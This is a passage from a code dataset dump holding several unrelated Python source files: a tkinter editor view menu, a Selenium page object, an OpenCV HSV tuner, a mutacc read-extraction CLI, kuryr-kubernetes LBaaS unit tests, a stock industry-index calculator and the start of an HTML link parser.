main()","sub_path":"python/CodingExercises/Anagram-Bloomberg.py","file_name":"Anagram-Bloomberg.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"449681102","text":"import include\nfrom tkinter import BooleanVar\n\n\nclass Zoom:\n def __init__(self, zoom_label, font):\n self.font = font\n self.zoomed = 0\n self.zoom_count = 100\n self.zoom_label = zoom_label\n\n def zoom_in(self, event=None):\n '''Increase font_size by 1 upto 50 times from default_size'''\n\n if self.zoom_count != 500: # 500% is the maximum perecentage to zoom-in\n self.zoomed += 1\n font_size = self.font['size'] + 1\n self.font.configure(size=font_size)\n\n self.zoom_count += 10\n self.zoom_label['text'] = f'{self.zoom_count}%'\n self.save_zoomed(self.zoomed)\n\n def zoom_out(self, event=None):\n '''Decrease font_size by 1 upto 10 times from default_size'''\n\n if self.zoom_count != 10: # 10% is the minimum percentage to zoom-out\n self.zoomed -= 1\n font_size = self.font['size'] - 1\n\n if font_size != 0:\n self.font.configure(size=font_size)\n\n self.zoom_count -= 10\n self.zoom_label['text'] = f'{self.zoom_count}%'\n self.save_zoomed(self.zoomed)\n\n def default_zoom(self, event=None):\n '''Change zoomed_in and zoomed_out fonts to the default_size'''\n\n self.zoom_count = 100\n self.zoom_label['text'] = '100%'\n self.save_zoomed()\n\n def save_zoomed(self, zoomed=None):\n '''Save the amount of zoom in and zoom out to the json file'''\n\n font_details = include.get_font_details()\n\n if zoomed is None: # This means remove zoomed amount\n self.zoomed = 0\n\n if 'Zoomed' in font_details:\n font_details.pop('Zoomed')\n\n self.font.configure(family=font_details['Font Family'], size=font_details['Font Size'])\n\n else:\n font_details['Zoomed'] = self.zoomed\n\n include.save_font_details(font_details)\n\n\nclass LineNumber:\n '''Update line numbers'''\n\n def __init__(self, master, line_canvas, text_widget, font):\n self.font = font\n self.master = master\n self.line_canvas = line_canvas\n self.text_widget = text_widget\n\n def redraw(self):\n '''Draw line number when the cursor goes to new line'''\n\n self.line_canvas.delete(\"all\")\n i = self.text_widget.index(\"@0,0\")\n\n while True:\n dline = self.text_widget.dlineinfo(i)\n\n if dline is None:\n break\n\n y = dline[1]\n linenum = str(i).split(\".\")[0]\n\n font = (self.font['family'], self.font['size'])\n self.line_canvas.create_text(2, y, anchor=\"nw\", text=linenum, font=font)\n i = self.text_widget.index(\"%s+1line\" % i)\n\n self.master.after(100, self.redraw)\n\n\nclass View:\n def __init__(self, master, text_widget, text_widget_frame, canvas_frame, line_canvas, status_bar_frame, zoom_label, font):\n self.master = master\n self.line_canvas = line_canvas\n self.text_widget = text_widget\n self.canvas_frame = canvas_frame\n self.zoom = Zoom(zoom_label, font)\n self.status_bar_frame = status_bar_frame\n self.text_widget_frame = text_widget_frame\n self.line_number = LineNumber(master, line_canvas, text_widget, font)\n\n self.show_status_bar = BooleanVar(value=True)\n self.fullscreen_var = BooleanVar(value=False)\n self.line_number_var = BooleanVar(value=False)\n\n def zoom_in(self, evet=None):\n self.zoom.zoom_in()\n\n def zoom_out(self, evet=None):\n self.zoom.zoom_out()\n\n def default_zoom(self, evet=None):\n self.zoom.default_zoom()\n\n def toggle_statusbar(self, event=None):\n '''Show or hide status-bar when user clicks Status-bar sub-menu in\n View menu or when user presses Alt+S'''\n\n if self.show_status_bar:\n self.show_status_bar = False\n self.status_bar_frame.grid_forget()\n\n else:\n self.show_status_bar = True\n self.status_bar_frame.grid(row=2, column=0, sticky='e')\n\n def set_full_screen(self, event=None):\n '''Change window to full-screen when user user clicks FullScreen\n sub-menu in View-Menu or when presses F11'''\n\n state = False if self.master.wm_attributes('-fullscreen') else True\n self.master.wm_attributes('-fullscreen', state)\n\n def toggle_linenumber(self, event=None):\n '''Hide and show line_number'''\n\n if self.line_number_var:\n self.line_number_var = False\n self.canvas_frame.pack_forget()\n\n else:\n self.line_number_var = True\n self.canvas_frame.pack(side='left', fill='y')\n self.text_widget_frame.pack(side='right', fill='both', expand=True)\n self.line_number.redraw()\n self.line_canvas.configure(scrollregion=self.line_canvas.bbox('all'))\n","sub_path":"PROJECT GUIs/ZPAD/view_menu.py","file_name":"view_menu.py","file_ext":"py","file_size_in_byte":4886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"384267575","text":"from selenium.webdriver.common.by import By\n\n\nclass Class_menu_cierre_edicion:\n\n def __init__(self, myDriver):\n self.driver = myDriver\n self.menu_general_button = (By.ID, \"menu-toggle-2\") # MENU GENERAL\n self.menu_cierre_edicion = (By.XPATH, '//*[@id=\"menu\"]/li[2]/a') # MENU CIERRE DE EDICION\n self.option_menu_ciere_edicion = (By.XPATH, '//*[@id=\"orden_armado_li\"]/a') # OPCION MENU CIERRE DE EDICION","sub_path":"Pages_Objects/Funciones_Comunes/Menus/Menu_Cierre_Edicion.py","file_name":"Menu_Cierre_Edicion.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"636903428","text":"import cv2\nimport numpy as np\nimport sys\nimport time\n\ndef nothing(x):\n pass\nfps_time = time.time()\n\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\ncv2.namedWindow('hsv_tune',cv2.WINDOW_AUTOSIZE)\ncv2.resizeWindow(\"hsv_tune\", 640, 480)\ncv2.createTrackbar('hl', 'hsv_tune', 0, 179, nothing)\ncv2.createTrackbar('hu', 'hsv_tune', 179, 179, nothing)\ncv2.createTrackbar('sl', 'hsv_tune', 0, 255, nothing)\ncv2.createTrackbar('su', 'hsv_tune', 255, 255, nothing)\ncv2.createTrackbar('vl', 'hsv_tune', 0, 255, nothing)\ncv2.createTrackbar('vu', 'hsv_tune', 255, 255, nothing)\nwhile(True):\n frame = cv2.imread(r'..\\img\\led18.jpg')\n #ret , frame = cap.read()\n \"\"\"\n if time.time()-fps_time>0:\n fps = int(1/(time.time()-fps_time))\n fps_time = time.time()\n else:\n\t\tfps=0\n #fps = cv2.cv.CV_CAP_PROP_FPS\n print 'FPS = ' , fps\n \"\"\"\n h, s, v = 100, 100, 100\n hl = cv2.getTrackbarPos('hl', 'hsv_tune')\n hu = cv2.getTrackbarPos('hu', 'hsv_tune')\n sl = cv2.getTrackbarPos('sl', 'hsv_tune')\n su = cv2.getTrackbarPos('su', 'hsv_tune')\n vl = cv2.getTrackbarPos('vl', 'hsv_tune')\n vu = cv2.getTrackbarPos('vu', 'hsv_tune')\n kernel = np.ones((5,5),np.uint8)\n \n #blur = frame\n blur = cv2.GaussianBlur(frame,(5,5),0)\n hsv = cv2.cvtColor(blur, cv2.COLOR_BGR2HSV)\n lower = np.array([hl, sl, vl])\n upper = np.array([hu, su, vu])\n\n mask = cv2.inRange(hsv, lower, upper)\n #blur = cv2.medianBlur(mask,5)\n mask = cv2.dilate(mask, kernel, iterations=3)\n result = cv2.bitwise_and(blur, blur, mask=mask)\n cv2.imshow(\"hsv_tune\", result)\n if cv2.waitKey(1) & 0xFF == ord(\"q\"):\n cap.release()\n break\n\ncv2.destroyAllWindows()\n","sub_path":"Test/Script/hsv.py","file_name":"hsv.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"612774329","text":"import logging\nimport pickle\n\nimport click\nfrom pymongo.errors import WriteError as MongoWriteError\nfrom mongo_adapter import get_client\n\n\nfrom mutacc.parse.path_parse import make_dir\nfrom mutacc.parse.yaml_parse import yaml_parse\nfrom mutacc.builds.build_case import CompleteCase\nfrom mutacc.mutaccDB.insert import insert_entire_case\n\n\nLOG = logging.getLogger(__name__)\n\n@click.command('extract')\n@click.option('-c', '--case',\n type = click.Path(exists = True),\n help = \" .yaml file for case. See README.md for information on what to include or example .yaml file in data/data.yaml\")\n@click.option('--padding', default = 300)\n@click.option('--mutacc-dir', type=click.Path())\n@click.option('-o', '--out-dir', type=click.Path())\n@click.pass_context\ndef extract_command(context, case, padding, mutacc_dir, out_dir):\n\n \"\"\"\n extract reads from case\n \"\"\"\n LOG.info(\"extracting reads from case {0}\".format(case))\n\n mutacc_dir = mutacc_dir or context.obj.get('mutacc_dir')\n mutacc_dir = make_dir(mutacc_dir)\n\n case = yaml_parse(case)\n\n case = CompleteCase(case)\n\n case.get_variants(padding = padding)\n case.get_samples(mutacc_dir)\n case.get_case()\n\n out_dir = out_dir or context.obj.get('case_dir')\n out_dir = make_dir(out_dir)\n\n pickle_file = out_dir.joinpath(case.case_id + \"_case\"+ \".mutacc\")\n\n #Serialize case object to file for later import\n with open(pickle_file, \"wb\") as pickle_handle:\n\n pickle.dump(case, pickle_handle)\n\n LOG.info(\"to import reads into mutaccDB, do: \\n mutacc db import {}\".format(\n pickle_file\n )\n )\n","sub_path":"mutacc/cli/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"536940440","text":"from django.conf.urls import patterns, url\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.views.generic import RedirectView\n\n\nurlpatterns = patterns('rhizome.journal.views',\n url(r'^$',\n view='index',\n name='blog_index'\n ),\n\n url(r'^tags/(?P[-.\\w]+)/$',\n view='tag_index',\n name='blog_tag_index'\n ),\n\n url(r'^tag/(?P[-.\\w]+)/$',\n view='tag_index',\n name='blog_tag_index'\n ),\n url(r'^tags/$', RedirectView.as_view(url=reverse_lazy('blog_index'))),\n # url(r'^tag.php',\n # view='old_tag_forward',\n # name='old_tag_forward'\n # ),\n\n url(r'^artist-profiles/$',\n view='artist_profiles',\n name='blog_artist_profiles'\n ),\n\n url(r'^(?P\\d{4})/(?P\\w{3})/(?P\\d{1,2})/(?P[-\\w]+)/$',\n view='detail',\n name='blog_detail'\n ),\n\n url(r'^(?P\\d+)/$',\n view='detail_forward',\n name='blog_detail_forward'\n ),\n\n url(r'^(?P\\d+)/save/$',\n view='save',\n name='blog_save'\n )\n)\n","sub_path":"rhizome/journal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"40700971","text":"# Copyright (c) 2016 Mirantis, Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport mock\nimport os_vif.objects.network as osv_network\nimport os_vif.objects.subnet as osv_subnet\n\nfrom kuryr_kubernetes.controller.drivers import base as drv_base\nfrom kuryr_kubernetes.controller.handlers import lbaas as h_lbaas\nfrom kuryr_kubernetes import exceptions as k_exc\nfrom kuryr_kubernetes.objects import lbaas as obj_lbaas\nfrom kuryr_kubernetes.tests import base as test_base\n\n\nclass TestLBaaSSpecHandler(test_base.TestCase):\n\n @mock.patch('kuryr_kubernetes.controller.drivers.base'\n '.ServiceSecurityGroupsDriver.get_instance')\n @mock.patch('kuryr_kubernetes.controller.drivers.base'\n '.ServiceSubnetsDriver.get_instance')\n @mock.patch('kuryr_kubernetes.controller.drivers.base'\n '.ServiceProjectDriver.get_instance')\n def test_init(self, m_get_drv_project, m_get_drv_subnets, m_get_drv_sg):\n m_get_drv_project.return_value = mock.sentinel.drv_project\n m_get_drv_subnets.return_value = mock.sentinel.drv_subnets\n m_get_drv_sg.return_value = mock.sentinel.drv_sg\n\n handler = h_lbaas.LBaaSSpecHandler()\n\n self.assertEqual(mock.sentinel.drv_project, handler._drv_project)\n self.assertEqual(mock.sentinel.drv_subnets, handler._drv_subnets)\n self.assertEqual(mock.sentinel.drv_sg, handler._drv_sg)\n\n def test_on_present(self):\n svc_event = mock.sentinel.svc_event\n old_spec = mock.sentinel.old_spec\n new_spec = mock.sentinel.new_spec\n\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n m_handler._get_lbaas_spec.return_value = old_spec\n m_handler._has_lbaas_spec_changes.return_value = True\n m_handler._generate_lbaas_spec.return_value = new_spec\n\n h_lbaas.LBaaSSpecHandler.on_present(m_handler, svc_event)\n\n m_handler._get_lbaas_spec.assert_called_once_with(svc_event)\n m_handler._has_lbaas_spec_changes.assert_called_once_with(svc_event,\n old_spec)\n m_handler._generate_lbaas_spec.assert_called_once_with(svc_event)\n m_handler._set_lbaas_spec.assert_called_once_with(svc_event, new_spec)\n\n def test_on_present_no_changes(self):\n svc_event = mock.sentinel.svc_event\n old_spec = mock.sentinel.old_spec\n\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n m_handler._get_lbaas_spec.return_value = old_spec\n m_handler._has_lbaas_spec_changes.return_value = False\n\n h_lbaas.LBaaSSpecHandler.on_present(m_handler, svc_event)\n\n m_handler._get_lbaas_spec.assert_called_once_with(svc_event)\n m_handler._has_lbaas_spec_changes.assert_called_once_with(svc_event,\n old_spec)\n m_handler._generate_lbaas_spec.assert_not_called()\n m_handler._set_lbaas_spec.assert_not_called()\n\n def test_get_service_ip(self):\n svc_body = {'spec': {'type': 'ClusterIP',\n 'clusterIP': mock.sentinel.cluster_ip}}\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n\n ret = h_lbaas.LBaaSSpecHandler._get_service_ip(m_handler, svc_body)\n self.assertEqual(mock.sentinel.cluster_ip, ret)\n\n def test_get_service_ip_not_cluster_ip(self):\n svc_body = {'spec': {'type': 'notClusterIP',\n 'clusterIP': mock.sentinel.cluster_ip}}\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n\n ret = h_lbaas.LBaaSSpecHandler._get_service_ip(m_handler, svc_body)\n self.assertIsNone(ret)\n\n def _make_test_net_obj(self, cidr_list):\n subnets = [osv_subnet.Subnet(cidr=cidr) for cidr in cidr_list]\n subnets_list = osv_subnet.SubnetList(objects=subnets)\n return osv_network.Network(subnets=subnets_list)\n\n def test_get_subnet_id(self):\n test_ip = '1.2.3.4'\n test_cidr = '1.2.3.0/24'\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n m_drv_subnets = mock.Mock(spec=drv_base.ServiceSubnetsDriver)\n m_handler._drv_subnets = m_drv_subnets\n m_drv_subnets.get_subnets.return_value = {\n mock.sentinel.subnet_id: self._make_test_net_obj([test_cidr])\n }\n\n self.assertEqual(mock.sentinel.subnet_id,\n h_lbaas.LBaaSSpecHandler._get_subnet_id(\n m_handler,\n mock.sentinel.service,\n mock.sentinel.project_id,\n test_ip))\n m_drv_subnets.get_subnets.assert_called_once_with(\n mock.sentinel.service, mock.sentinel.project_id)\n\n def test_get_subnet_id_invalid(self):\n test_ip = '1.2.3.4'\n test_cidr = '3.2.1.0/24'\n m_service = mock.MagicMock()\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n m_drv_subnets = mock.Mock(spec=drv_base.ServiceSubnetsDriver)\n m_handler._drv_subnets = m_drv_subnets\n m_drv_subnets.get_subnets.return_value = {\n mock.sentinel.subnet_id: self._make_test_net_obj([test_cidr])\n }\n\n self.assertRaises(k_exc.IntegrityError,\n h_lbaas.LBaaSSpecHandler._get_subnet_id,\n m_handler,\n m_service,\n mock.sentinel.project_id,\n test_ip)\n\n def test_generate_lbaas_spec(self):\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n\n service = mock.sentinel.service\n project_id = mock.sentinel.project_id\n ip = mock.sentinel.ip\n subnet_id = mock.sentinel.subnet_id\n ports = mock.sentinel.ports\n sg_ids = mock.sentinel.sg_ids\n\n m_drv_project = mock.Mock()\n m_drv_project.get_project.return_value = project_id\n m_drv_sg = mock.Mock()\n m_drv_sg.get_security_groups.return_value = sg_ids\n m_handler._drv_project = m_drv_project\n m_handler._drv_sg = m_drv_sg\n m_handler._get_service_ip.return_value = ip\n m_handler._get_subnet_id.return_value = subnet_id\n m_handler._generate_lbaas_port_specs.return_value = ports\n\n spec_ctor_path = 'kuryr_kubernetes.objects.lbaas.LBaaSServiceSpec'\n with mock.patch(spec_ctor_path) as m_spec_ctor:\n m_spec_ctor.return_value = mock.sentinel.ret_obj\n ret_obj = h_lbaas.LBaaSSpecHandler._generate_lbaas_spec(\n m_handler, service)\n self.assertEqual(mock.sentinel.ret_obj, ret_obj)\n m_spec_ctor.assert_called_once_with(\n ip=ip,\n project_id=project_id,\n subnet_id=subnet_id,\n ports=ports,\n security_groups_ids=sg_ids)\n\n m_drv_project.get_project.assert_called_once_with(service)\n m_handler._get_service_ip.assert_called_once_with(service)\n m_handler._get_subnet_id.assert_called_once_with(\n service, project_id, ip)\n m_handler._generate_lbaas_port_specs.assert_called_once_with(service)\n m_drv_sg.get_security_groups.assert_called_once_with(\n service, project_id)\n\n def test_has_lbaas_spec_changes(self):\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n service = mock.sentinel.service\n lbaas_spec = mock.sentinel.lbaas_spec\n\n for has_ip_changes in (True, False):\n for has_port_changes in (True, False):\n m_handler._has_ip_changes.return_value = has_ip_changes\n m_handler._has_port_changes.return_value = has_port_changes\n ret = h_lbaas.LBaaSSpecHandler._has_lbaas_spec_changes(\n m_handler, service, lbaas_spec)\n self.assertEqual(has_ip_changes or has_port_changes, ret)\n\n def test_get_service_ports(self):\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n service = {'spec': {'ports': [\n {'port': 1},\n {'port': 2, 'name': 'X', 'protocol': 'UDP'}\n ]}}\n expected_ret = [\n {'port': 1, 'name': None, 'protocol': 'TCP'},\n {'port': 2, 'name': 'X', 'protocol': 'UDP'}]\n\n ret = h_lbaas.LBaaSSpecHandler._get_service_ports(m_handler, service)\n self.assertEqual(expected_ret, ret)\n\n def test_has_port_changes(self):\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n m_service = mock.MagicMock()\n m_handler._get_service_ports.return_value = [\n {'port': 1, 'name': 'X', 'protocol': 'TCP'},\n ]\n\n m_lbaas_spec = mock.MagicMock()\n m_lbaas_spec.ports = [\n obj_lbaas.LBaaSPortSpec(name='X', protocol='TCP', port=1),\n obj_lbaas.LBaaSPortSpec(name='Y', protocol='TCP', port=2),\n ]\n\n ret = h_lbaas.LBaaSSpecHandler._has_port_changes(\n m_handler, m_service, m_lbaas_spec)\n\n self.assertTrue(ret)\n\n def test_has_port_changes__no_changes(self):\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n m_service = mock.MagicMock()\n m_handler._get_service_ports.return_value = [\n {'port': 1, 'name': 'X', 'protocol': 'TCP'},\n {'port': 2, 'name': 'Y', 'protocol': 'TCP'}\n ]\n\n m_lbaas_spec = mock.MagicMock()\n m_lbaas_spec.ports = [\n obj_lbaas.LBaaSPortSpec(name='X', protocol='TCP', port=1),\n obj_lbaas.LBaaSPortSpec(name='Y', protocol='TCP', port=2),\n ]\n\n ret = h_lbaas.LBaaSSpecHandler._has_port_changes(\n m_handler, m_service, m_lbaas_spec)\n\n self.assertFalse(ret)\n\n def test_has_ip_changes(self):\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n m_service = mock.MagicMock()\n m_handler._get_service_ip.return_value = '1.1.1.1'\n m_lbaas_spec = mock.MagicMock()\n m_lbaas_spec.ip.__str__.return_value = '2.2.2.2'\n\n ret = h_lbaas.LBaaSSpecHandler._has_ip_changes(\n m_handler, m_service, m_lbaas_spec)\n self.assertTrue(ret)\n\n def test_has_ip_changes__no_changes(self):\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n m_service = mock.MagicMock()\n m_handler._get_service_ip.return_value = '1.1.1.1'\n m_lbaas_spec = mock.MagicMock()\n m_lbaas_spec.ip.__str__.return_value = '1.1.1.1'\n\n ret = h_lbaas.LBaaSSpecHandler._has_ip_changes(\n m_handler, m_service, m_lbaas_spec)\n self.assertFalse(ret)\n\n def test_has_ip_changes__no_spec(self):\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n m_service = mock.MagicMock()\n m_handler._get_service_ip.return_value = '1.1.1.1'\n m_lbaas_spec = None\n\n ret = h_lbaas.LBaaSSpecHandler._has_ip_changes(\n m_handler, m_service, m_lbaas_spec)\n self.assertTrue(ret)\n\n def test_has_ip_changes__no_nothing(self):\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n m_service = mock.MagicMock()\n m_handler._get_service_ip.return_value = None\n m_lbaas_spec = None\n\n ret = h_lbaas.LBaaSSpecHandler._has_ip_changes(\n m_handler, m_service, m_lbaas_spec)\n self.assertFalse(ret)\n\n def test_generate_lbaas_port_specs(self):\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n m_handler._get_service_ports.return_value = [\n {'port': 1, 'name': 'X', 'protocol': 'TCP'},\n {'port': 2, 'name': 'Y', 'protocol': 'TCP'}\n ]\n expected_ports = [\n obj_lbaas.LBaaSPortSpec(name='X', protocol='TCP', port=1),\n obj_lbaas.LBaaSPortSpec(name='Y', protocol='TCP', port=2),\n ]\n\n ret = h_lbaas.LBaaSSpecHandler._generate_lbaas_port_specs(\n m_handler, mock.sentinel.service)\n self.assertEqual(expected_ports, ret)\n m_handler._get_service_ports.assert_called_once_with(\n mock.sentinel.service)\n\n def test_get_endpoints_link(self):\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n service = {'metadata': {\n 'selfLink': \"/api/v1/namespaces/default/services/test\"}}\n ret = h_lbaas.LBaaSSpecHandler._get_endpoints_link(m_handler, service)\n expected_link = \"/api/v1/namespaces/default/endpoints/test\"\n self.assertEqual(expected_link, ret)\n\n def test_get_endpoints_link__integrity_error(self):\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n service = {'metadata': {\n 'selfLink': \"/api/v1/namespaces/default/not-services/test\"}}\n self.assertRaises(k_exc.IntegrityError,\n h_lbaas.LBaaSSpecHandler._get_endpoints_link,\n m_handler, service)\n\n def test_set_lbaas_spec(self):\n self.skipTest(\"skipping until generalised annotation handling is \"\n \"implemented\")\n\n def test_get_lbaas_spec(self):\n self.skipTest(\"skipping until generalised annotation handling is \"\n \"implemented\")\n","sub_path":"kuryr_kubernetes/tests/unit/controller/handlers/test_lbaas.py","file_name":"test_lbaas.py","file_ext":"py","file_size_in_byte":13592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"111846429","text":"from sqlalchemy import create_engine\nfrom datetime import datetime\nfrom Utils.DBOperation import getTradeDates, getDataFromSQL, getIncrmDataFromSQL, writeDB, checkIfIncre\nfrom Utils.DB_config import ConfigQuant\nfrom Utils.Algorithms import calWeightedSumIndexQuote\n\nConfigIndustry = {\n 'tableName':'STOCK_INDUSTRY',\n 'code': 'code',\n 'date': 'date',\n 'industry': 'industry',\n 'time_stamp': 'time_stamp'\n}\n\nConQuote ={\n 'tableName': 'STOCK_FORWARD_ADJ_QUOTE',\n 'code': 'code',\n 'date': 'date',\n 'fields': ['open', 'high', 'low', 'close', 'volume', 'amount', 'turnover'],\n 'time_stamp': 'time_stamp'\n}\n\nConWeights = {\n 'tableName': 'STOCK_FUNDAMENTAL_BASIC',\n 'code': 'code',\n 'date': 'date',\n 'weight': 'FREE_MRK_CAP',\n 'time_stamp': 'time_stamp'\n}\n\ntargetTableName = 'INDUSTRY_INDEX_FORWARD_ADJ_QUOTE'\ntargetDateField = 'date'\ntargetTimeStampField = 'time_stamp'\n\ndef calFullIndustry(db_config, con_industry, con_quote, con_weights, chunk_size, start_date = '2007-01-01'):\n # create sql engine\n my_engine = create_engine('mysql+pymysql://{user}:{password}@{host}/{db}?charset={charset}'.format(**db_config))\n\n # get total trade dates\n trade_dates = getTradeDates(my_engine, con_quote['date'], con_quote['tableName'], start_date)\n\n # read and process data by trade dates\n quote_fields = list(map(lambda x: '`%s`' % x, con_quote['fields']))\n quote_fields = ','.join(quote_fields)\n write_sql_method = 'replace'\n for i in range(int(trade_dates.size / chunk_size) + 1):\n tmp_trade_dates = trade_dates[i*chunk_size : (i+1)*chunk_size]\n tmp_trade_dates = list(map(lambda x: \"'%s'\" % x, tmp_trade_dates))\n date_range = ','.join(tmp_trade_dates)\n\n # get quote data\n basic_data = getDataFromSQL(my_engine, con_quote['date'], con_quote['code'], quote_fields,\n con_quote['tableName'], date_range)\n # get weights\n weight_field = '`%s`' % con_weights['weight']\n weights = getDataFromSQL(my_engine, con_weights['date'], con_weights['code'], weight_field,\n con_weights['tableName'], date_range)\n weights = weights.rename(columns={con_weights['weight']: 'weight'})\n\n # get industry\n industry_field = '`%s`' % con_industry['industry']\n industry = getDataFromSQL(my_engine, con_industry['date'], con_weights['code'], industry_field,\n con_industry['tableName'], date_range)\n industry = industry.rename(columns={con_industry['industry']: 'industry'})\n # tot_ind = industry['industry'].unique()\n\n basic_data = basic_data.merge(weights, on=['date', 'code'], how='inner')\n basic_data = basic_data.merge(industry, on=['date', 'code'], how='inner')\n\n # calculate index quote\n industry_index_quote = calWeightedSumIndexQuote(basic_data, con_quote['fields'], 'date', 'industry', 'weight')\n\n # add timestamp\n industry_index_quote[targetTimeStampField] = datetime.now()\n\n # dump data to sql\n writeDB(targetTableName, industry_index_quote, db_config, write_sql_method)\n write_sql_method = 'append'\n\n\ndef calIncrmIndustry(db_config, con_industry, con_quote, con_weights, chunk_size, start_date = '2007-01-01'):\n # create sql engine\n my_engine = create_engine('mysql+pymysql://{user}:{password}@{host}/{db}?charset={charset}'.format(**db_config))\n\n # incremtental to database\n write_sql_method = 'append'\n\n # get quote data (trim by timestamp)\n quote_fields = list(map(lambda x: '`%s`' % x, con_quote['fields']))\n quote_fields = ','.join(quote_fields)\n basic_data = getIncrmDataFromSQL(my_engine, con_quote['date'], con_quote['code'], quote_fields,\n con_quote['tableName'], targetTableName, con_quote['date'], targetDateField)\n\n # already the latest data\n if basic_data.empty:\n return\n\n # get weights (trim by timestamp)\n weight_field = '`%s`' % con_weights['weight']\n weights = getIncrmDataFromSQL(my_engine, con_weights['date'], con_weights['code'], weight_field,\n con_weights['tableName'], targetTableName, con_weights['date'], targetDateField)\n weights = weights.rename(columns={con_weights['weight']: 'weight'})\n\n # get industry (trim by timestamp)\n ind_field = '`%s`' % con_industry['industry']\n industry = getIncrmDataFromSQL(my_engine, con_industry['date'], con_weights['code'], ind_field,\n con_industry['tableName'], targetTableName, con_industry['date'], targetDateField)\n industry = industry.rename(columns={con_industry['industry']: 'industry'})\n\n basic_data = basic_data.merge(weights, on=['date', 'code'], how='inner')\n basic_data = basic_data.merge(industry, on=['date', 'code'], how='inner')\n\n # calculate index quote\n industry_index_quote = calWeightedSumIndexQuote(basic_data, con_quote['fields'], 'date', 'industry', 'weight')\n\n # add timestamp\n industry_index_quote[targetTimeStampField] = datetime.now()\n\n # dump data to sql1\n writeDB(targetTableName, industry_index_quote, db_config, write_sql_method)\n\ndef airflowCallable():\n start_date = '2007-01-01'\n chunk_size = 10\n\n calIncrmIndustry(ConfigQuant, ConfigIndustry, ConQuote, ConWeights, chunk_size, start_date)\n\nif __name__ == '__main__':\n # start_date = '2007-01-01'\n # chunk_size = 10\n #\n # is_full, last_record_date, start_fetch_date = checkIfIncre(ConfigQuant, ConQuote['tableName'],\n # targetTableName, ConQuote['date'], [0], '', False)\n #\n # # *********** sw index quote is avaliable, try to use them directly instead of sum by weights\n # if is_full == 1:\n # calFullIndustry(ConfigQuant, ConfigIndustry, ConQuote, ConWeights, chunk_size, start_date)\n # elif is_full == 0:\n # calIncrmIndustry(ConfigQuant, ConfigIndustry, ConQuote, ConWeights, chunk_size, start_date)\n # else:\n # pass\n\n airflowCallable()","sub_path":"Basic/calForwardAdjIndustryIndex.py","file_name":"calForwardAdjIndustryIndex.py","file_ext":"py","file_size_in_byte":6083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"178968472","text":"from user_interface.coordinates import EnemyCords\n\n\nclass EnemyMonitor(object):\n def __init__(self):\n self.coordinates = EnemyCords()\n self.current_enemies = []\n self.enemy_count = 0\n\n def get_enemies(self, image):\n current_enemies = []\n for enemy in self.coordinates.enemies:\n pixel = image.getpixel(enemy)\n if len(pixel) > 3:\n pixel = (pixel[0], pixel[1], pixel[2])\n if pixel == self.coordinates.over_color \\\n or pixel == self.coordinates.under_color:\n current_enemies.append(self.coordinates.enemy_press[enemy])\n self.current_enemies = current_enemies\n self.enemy_count = len(current_enemies)\n","sub_path":"enemies/enemy_monitor.py","file_name":"enemy_monitor.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"356033787","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\"\"\"\n Topic: sample\n Desc : \n\"\"\"\nfrom html.parser import HTMLParser\n\nimport re\nfrom urllib.request import Request, urlopen\n\n\nclass Parselinks(HTMLParser):\n def __init__(self):\n self.data = []\n self.href = 0\n self.linkname = ''\n self.patt = re.compile(r'^/doc/\\d+$')\n HTMLParser.__init__(self)\n\n def handle_starttag(self, tag, attrs):\n if tag == 'a':\n for name, value in attrs:\n if name == 'href' and re.match(self.patt, value):\n self.href = 1\n self.data.append([value])\n\n def handle_data(self, data):\n if self.href:\n 